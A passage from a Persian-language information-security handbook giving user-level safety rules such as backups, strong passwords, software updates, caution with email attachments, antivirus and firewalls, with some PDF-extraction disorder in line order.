‫ﺍﻣﻨﻴﺘﻲ ﺿﻌﻴﻒ ﻫﺴﺘﻨﺪ( ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧـﺪ؟ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﺭﺻـﻮﺭﺕ‬
‫ﻣﺸﺎﻫﺪﺓ ﻳﻚ ﻣﻮﺭﺩ ﻏﻴﺮﻋﺎﺩﻱ ﻳﺎ ﻣﺸﻜﻮﻙ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻨﺪ ﻛﻪ‬
‫ﭼﻪ ﻛﻨﻨﺪ ﻭ ﺑﺎ ﭼﻪ ﻛﺴﻲ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻧﺪ‪ .‬ﺗﻬﻴﺔ ﻳﻚ ﺑﺮﻧﺎﻣﺔ‬
‫ﺁﻣﻮﺯﺷﻲ ﻣﻨﺎﺳﺐ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ ﻣـﻲﺗﻮﺍﻧـﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ‬
‫ﻗﺴﻤﺘﻲ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺗـﺪﺍﻓﻌﻲ ﺷـﻤﺎ ﺗﺒـﺪﻳﻞ ﻛﻨـﺪ‪ .‬ﻧﺎﺁﮔـﺎﻩ‬
‫ﻧﮕﻬﺪﺍﺷﺘﻦ ﻛﺎﺭﺑﺮﺍﻥ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎ ﻭ ﻋﻤﻠﻜـﺮﺩ‬
‫ﺳﻴﺴﺘﻢ ﺑﺎﻋﺚ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ ﻧﻤﻲﮔﺮﺩﺩ؛ ﭼﺮﺍﻛﻪ ﻫﻤـﻮﺍﺭﻩ‬
‫ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻳﮕـﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﻣﻬﺎﺟﻤﺎﻥ ﻣﺼﻤﻢ ﺑﺎﺷﺪ‪.‬‬
‫‪.۴‬‬
‫ﺷﻜﺎﻙ ﻭ ﻛﻨﺠﻜﺎﻭ ﺑﺎﺷﻴﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺍﺗﻔﺎﻗﻲ ﺍﻓﺘﺎﺩ ﻛـﻪ‬
‫ﺑﻪ ﻧﻈﺮ ﻏﻴﺮﻣﻌﻤﻮﻝ ﻣﻲﻧﻤﻮﺩ‪ ،‬ﺑﻪ ﻭﺟﻮﺩ ﻣﻬﺎﺟﻢ ﺷﻚ ﻛﻨﻴﺪ‬
‫ﻻ ﺩﺭ ﺧﻮﺍﻫﻴـﺪ‬
‫ﻭ ﺩﺭ ﺁﻥ ﻣﻮﺭﺩ ﺑﻪ ﺑﺮﺭﺳﻲ ﺑﭙﺮﺩﺍﺯﻳﺪ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﻳﺎﻓﺖ ﻛﻪ ﻣﺸﻜﻞ ﺍﺯ ﻳﻚ ﺍﺷـﺘﺒﺎﻩ ﻭ ﻳـﺎ ﻳـﻚ ﺍﺷـﻜﺎﻝ ﺩﺭ‬
‫ﺭﻭﺵ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻣﻨﺒﻊ ﺑﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻣﺎ ﺑﺮﺧـﻲ ﻣﻮﺍﻗـﻊ‬
‫ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﻜﻞ ﺟﺪﻱﺗﺮﻱ ﭘﻴﺪﺍ ﺷﻮﺩ‪ .‬ﺑﻪ ﻫﻤـﻴﻦ‬
‫ﺩﻟﻴﻞ ﻫﺮﮔﺎﻩ ﻣﺴﺌﻠﻪﺍﻱ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻗﺎﺩﺭ ﺑـﻪ ﺣﻼﺟـﻲ‬
‫ﺩﻗﻴﻖ ﺁﻥ ﻧﻴﺴﺘﻴﺪ ﺑﺎﻳﺪ ﻧﺴﺒﺖ ﺑﻪ ﺍﻣﻨﻴﺘـﻲ ﺑـﻮﺩﻥ ﻣـﺸﻜﻞ‬
‫ﻣﻈﻨﻮﻥ ﺷﻮﻳﺪ ﻭ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﺩﻗﻴﻖ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﺑﻴﺴﺖ ﻭ ﭘﻨﺞ ﻗﺎﻋﺪﺓ ﺧﺎﺹ ﺩﻳﮕﺮ‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻳﻤﻦﺗﺮ ﺍﺯ ﺭﺍﻳﺎﻧﻪ‬
‫ﻗﺎﻋﺪﺓ ‪ .۱‬ﭘــﻴﺶ ﺍﺯ ﻭﻗــﻮﻉ ﺳــﺮﻗﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺩﺭ ﻣــﻮﺭﺩ ﺁﻥ‬
‫ﺑﻴﺎﻧﺪﻳﺸﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۲‬ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ ﻭ ﻣﻄﻤـﺌﻦ‬
‫ﺷﻮﻳﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﻬﺪﻳﺪ ﻓﻴﺰﻳﻜﻲ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺑـﻪ ﺁﻧﻬـﺎ‬
‫ﺁﺳﻴﺒﻲ ﻭﺍﺭﺩ ﻧﻤﻲﺷﻮﺩ ﻭ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۳‬ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ ﺍﻧﺘﺨــﺎﺏ ﻛﻨﻴــﺪ ﻛــﻪ‬
‫ﺑﺴﺎﺩﮔﻲ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﻳـﺎﺩ ﺑﻴﺎﻭﺭﻳـﺪ ﺍﻣـﺎ ﺣـﺪﺱ‬
‫ﺯﺩﻥ ﺁﻥ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﻣﺸﻜﻞ ﺑﺎﺷﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۴‬ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺧﻮﺩ ﺭﺍ ﻫﻤﻮﺍﺭﻩ‬
‫ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۵‬ﺑﺮﻧﺎﻣــﺔ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺧــﻮﺩ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ‬
‫ﭘﻴﻜﺮﺑﻨــﺪﻱ ﻛﻨﻴــﺪ ﻛــﻪ ﺿــﻤﻴﻤﻪﻫــﺎ‪ ١٩٦‬ﺭﺍ ﺑــﺼﻮﺭﺕ‬
‫ﺧﻮﺩﻛﺎﺭ ﺑﺎﺯ ﻧﻜﻨﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۶‬ﻗﺒﻞ ﺍﺯ ﺑﺎﺯ ﻛﺮﺩﻥ ﻫﺮ ﻧﻮﻉ ﺿﻤﻴﻤﺔ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪،‬‬
‫ﺑﻪ ﻧﺎﻡ ﺁﻥ ﺩﻗﺖ ﻛﻨﻴﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻳـﻚ‬
‫ﺑﺮﻧﺎﻣﺔ ﺍﺟﺮﺍﻳﻲ ﻧﻴﺴﺖ‪.‬‬
‫‪196 Attachment‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﻣﺴﺘﻠﺰﻡ ﺗﻼﺵ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ‬
‫ﺍﺳﺖ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﺍﺕ ﻭ ﺗﺤﻠﻴـﻞ ﺳـﻮﺩ ﻭ‬
‫ﺯﻳﺎﻥ ﻭﻗﺖ ﻛﺎﻓﻲ ﻧﺪﺍﺭﻳﺪ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ ﺩﺳﺖﻛﻢ ﭼﻬﺎﺭ ﻣﺮﺣﻠـﺔ‬
‫ﺳﺎﺩﺓ ﺯﻳﺮ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﻴﺪ‪:‬‬
‫‪.۳‬‬
‫ﺑﺮﺍﻱ ﺗﻬﻴﻪ ﻭ ﺫﺧﻴﺮﺓ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻳـﻚ‬
‫ﻃﺮﺡ ﻣﺸﺮﻭﺡ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ‪ .‬ﺑﺎﻳـﺪ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤـﻞ‬
‫ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﻧﻴﺰ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺗـﺎ‬
‫ﺩﺭﺻﻮﺭﺕ ﺑﺮﻭﺯ ﻓﺠﺎﻳﻊ ﺟﺪﻱ ﻫﻢ ﺑﺘﻮﺍﻧﻴﺪ ﺳﻴﺴﺘﻢ ﺧـﻮﺩ ﺭﺍ‬
‫ﻣﺠﺪﺩﹰﺍ ﺑﺎﺯﺳﺎﺯﻱ ﻛﻨﻴﺪ‪.‬‬
‫‪٢٠٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻗﺎﻋﺪﺓ ‪ .۷‬ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺿﻤﻴﻤﻪﺍﻱ ﺭﺍ ﻛﻪ ﺍﺯ ﻳﻚ ﻏﺮﻳﺒﻪ ﺩﺭﻳﺎﻓﺖ‬
‫ﻛﺮﺩﻩ ﺍﻳﺪ ﺑﺎﺯ ﻧﻜﻨﻴﺪ‪ ،‬ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻓﺎﻳـﻞ‬
‫ﻣﺮﺑﻮﻃﻪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺣﺎﻭﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺑﺎﺷﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۸‬ﺍﺯ ﮔﺸﻮﺩﻥ ﺿﻤﻴﻤﻪﺍﻱ ﻛﻪ ﺍﺯ ﻃﺮﻑ ﻳﻚ ﻓﺮﺩ ﺁﺷـﻨﺎ ﻭ‬
‫ﻣﻄﻤﺌﻦ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﻫﻢ ﭘﺮﻫﻴﺰ ﻛﻨﻴﺪ‪ ،‬ﻣﮕـﺮ ﺁﻧﻜـﻪ‬
‫ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﺁﮔﺎﻫﺎﻧﻪ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۹‬ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ‬
‫ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﻔﻨﻨﻲ ‪ ١٩٧HTML‬ﺭﺍ ﭘـﺮﺩﺍﺯﺵ‬
‫ﻧﻜﻨﺪ ﻭ ﺑﺮﺍﻱ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺍﺭﺳﺎﻝ ﻧﻨﻤﺎﻳﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۰‬ﺍﺯ ‪ ISP‬ﺧﻮﺩ ﺑﭙﺮﺳﻴﺪ ﻛﻪ ﺁﻳﺎ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ‬
‫ﭘــﻴﺶ ﺍﺯ ﺗﺤﻮﻳــﻞ ﺑــﻪ ﺷــﻤﺎ ﺍﺯ ﻧﻈــﺮ ﻭﻳــﺮﻭﺱ ﻭ ﻳــﺎ‬
‫ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۱‬ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻫﺎﻱ ﻭﺏ ﺍﻣﻜـﺎﻥ ‪ download‬ﻭ ﺍﺟـﺮﺍﻱ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﺸﻜﻠـﺴﺎﺯ ﺑﺎﺷـﻨﺪ ﺭﺍ‬
‫ﻧﺪﻫﻴﺪ‪ ،‬ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻄﻤﺌﻦ ﺑﺎﺷـﻴﺪ ﭘﺎﻳﮕـﺎﻩ ﻣﺮﺑﻮﻃـﻪ‬
‫ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۲‬ﻧﻤﺎﻳﺶ ﺁﺩﺭﺱ ﭘﺎﻳﮕﺎﻩ ﻭﺑـﻲ ﻛـﻪ ﻣـﺮﻭﺭ ﻣـﻲﻛﻨﻴـﺪ ﻭ‬
‫ﺁﺩﺭﺳﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺍﺗﺼﺎﻝ ﺑـﻪ ﺁﻥ ﻫـﺴﺘﻴﺪ ﺭﺍ ﻓﻌـﺎﻝ‬
‫ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻫﻨﮕـﺎﻡ ﻣـﺮﻭﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻧﺎﺁﺷـﻨﺎ‬
‫ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ‪ ،‬ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺟـﺎﺯﺓ‬
‫ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﻣﻲﺩﻫﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۳‬ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ‪cookie‬ﻫﺎ ﺗﺤﺖ ﭼﻪ ﺷﺮﺍﻳﻄﻲ ﺩﺭ‬
‫ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﻗﺎﺩﺭ ﺑﻪ ﻛﻨﺘﺮﻝ ﺁﻧﻬـﺎ‬
‫ﻧﻴﺴﺘﻴﺪ )ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻣﻲ ﻛﻨﻴﺪ(‪ ،‬ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﺧﻮﺩ‬
‫ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۴‬ﭼﻨﺎﻧﭽﻪ ﻫﺮﮔﻮﻧﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻭ ﻣﺤﺮﻣﺎﻧـﻪﺍﻱ‬
‫ﺭﻭﻱ ﺻﻔﺤﺔ ﻭﺏ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﺁﻣﺪ‪ ،‬ﭘـﺲ ﺍﺯ ﺍﺗﻤـﺎﻡ‬
‫ﻛﺎﺭ‪ ،‬ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ‪ ١٩٨‬ﺭﺍ ﭘـﺎﻙ ﻛﻨﻴـﺪ‪ .‬ﺍﮔـﺮ ﻗـﺎﺩﺭ ﺑـﻪ‬
‫ﺍﻳﻨﻜﺎﺭ ﻧﻴﺴﺘﻴﺪ )ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤـﻮﻣﻲ‬
‫ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ( ﺷـﺎﻳﺪ ﺑﻬﺘــﺮ ﺑﺎﺷـﺪ ﺍﺯ ﺍﻧﺠـﺎﻡ ﻛــﺎﺭ‬
‫ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﻭﻱ ﺁﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﭙﺮﻫﻴﺰﻳﺪ‪.‬‬
‫‪197 HTML Fancy Scripts‬‬
‫‪198 Cache‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۵‬ﺍﮔﺮ ﺍﺯ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳـﻞ‪ ١٩٩‬ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﻛﻨﻴـﺪ‪ ،‬ﺁﻧـﺮﺍ‬
‫ﻏﻴﺮﻓﻌــﺎﻝ ﻛﻨﻴــﺪ‪ .‬ﺍﮔــﺮ ﺍﺯ ﺍﺷــﺘﺮﺍﻙ ﻓﺎﻳــﻞ ﺍﺳــﺘﻔﺎﺩﻩ‬
‫ﻣــﻲﻛﻨﻴــﺪ‪ ،‬ﻧﺎﻣﻬــﺎﻱ ﻛــﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ‬
‫ﻣﺴﺘﺤﻜﻢ ﺑﺮﮔﺰﻳﻨﻴـﺪ ﻭ ﻣﺠﻮﺯﻫـﺎﻱ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺗـﺎ‬
‫ﺣﺪﺍﻗﻞ ﻣﻤﻜﻦ ﻛﻪ ﻫﻤﭽﻨﺎﻥ ﺍﻣﻜﺎﻥ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣـﻮﺭﺩ‬
‫ﻧﻈﺮ ﺭﺍ ﺑﻪ ﺷﻤﺎ ﻣﻲﺩﻫﺪ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۶‬ﺍﮔﺮ ﺑﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮﻱ ﻓﺎﻳﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺍﻳﺪ‪،‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺁﻧﻬﺎ ﻧﻴﺰ ﻧﻜـﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ‬
‫ﺟﺪﻱ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۷‬ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺴﻴﺎﺭ ﻛﺎﺭﺁﻣـﺪ ﻭ ﻣﻔﻴـﺪ‬
‫ﺑﺎﺷﻨﺪ‪ ،‬ﻭﻟﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﻣﺮﺍﻗﺒﺖ ﻭ ﺁﮔﺎﻫﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۸‬ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺩﺳﺘﺮﺳـﻲ ﺭﺍﻫﺒـﺮﻱ‬
‫ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﻧﺪ ‪ -‬ﻣﺜﻞ ﻣﺮﻭﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ‪ -‬ﺣﺘـﻲ‬
‫ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻧﻴﺰ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺍﺯ ﺣـﺴﺎﺏ‬
‫ﻛﺎﺭﺑﺮﻱ ﺭﺍﻫﺒﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۹‬ﺗﻤﺎﻡ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻛـﻪ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﻳـﺎ‬
‫ﻛﺎﺭﺑﺮﺩ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۰‬ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻭﻳﺮﻭﺱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺍﺳﺖ‬
‫ﺭﺍ ﺑﻪ ﻧﺮﻡ ﺍﻓـﺰﺍﺭ ﺿـﺪﻭﻳﺮﻭﺱ ﻣﺠﻬـﺰ ﻛﻨﻴـﺪ ﻭ ﺑـﺮﺍﻱ‬
‫ﺩﺭﻳﺎﻓﺖ ﻧﺸﺎﻧﻬﺎﻱ ﺟﺪﻳﺪ ﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺭﻭﺯﺍﻧﻪ‬
‫ﺁﻧﺮﺍ ﺑﻪﺭﻭﺯ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ‬
‫ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺳـﺘﮕﺎﻩ ﺭﺍ ﺍﺯ ﻧﻈـﺮ ﻭﺟـﻮﺩ ﻭﻳـﺮﻭﺱ‪،‬‬
‫ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۱‬ﺣﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛـﻪ ﺑﻄـﻮﺭ ﺧـﺎﺹ ﺗﺤـﺖ‬
‫ﺗﻬﺎﺟﻢ ﻭﻳﺮﻭﺳﻬﺎ ﻗـﺮﺍﺭ ﻧﺪﺍﺭﻧـﺪ ‪ -‬ﻣﺜـﻞ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻮﻧﻴﻜﺲ ‪ -‬ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ‬
‫ﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﺩﻳﮕـﺮ ﻓﺮﺳـﺘﺎﺩﻩ‬
‫ﻣﻲﺷﻮﻧﺪ ﺁﻟﻮﺩﻩ ﺑﻪ ﻭﻳﺮﻭﺱ ﻧﻤﻲﺑﺎﺷﻨﺪ ﻭ ﺑﺮﺍﻱ ﮔﻴﺮﻧﺪﻩ‬
‫ﺧﻄﺮﻱ ﺩﺭ ﺑﺮ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۲‬ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﻳﺪ ﺑﺎ ﻳﻜﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ‬
‫ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ ،‬ﭼـﻪ ﺑـﺼﻮﺭﺕ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﻭﻱ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻭ ﭼـﻪ ﺑـﺼﻮﺭﺕ ﻳـﻚ‬
‫‪199 File Sharing‬‬
‫‪٢٠٧‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺗﻨﻬﺎ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺎ ﺩﺍﺩﻩﻫﺎ ﻛـﺎﺭ ﻛﻨﻨـﺪ‬
‫ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ )ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ‬
‫ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﺟﺪﺍﮔﺎﻧــﻪ ﺑــﺮﺍﻱ ﻣﺤﺎﻓﻈــﺖ ﺍﺯ ﺗﻤــﺎﻡ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻳﻚ ﺷﺒﻜﻪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۳‬ﺍﮔﺮ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺍﺑﺰﺍﺭ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺭﺍﻩ‬
‫ﺩﻭﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ‪ ،‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ ﺍﺯ ﺍﻣﻨﻴـﺖ‬
‫ﻣﺴﺘﺤﻜﻤﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ )ﺩﺭ ﺣﺎﻟﺖ ﺣـﺪﺍﻗﻠﻲ‪ ،‬ﺷﻨﺎﺳـﺔ‬
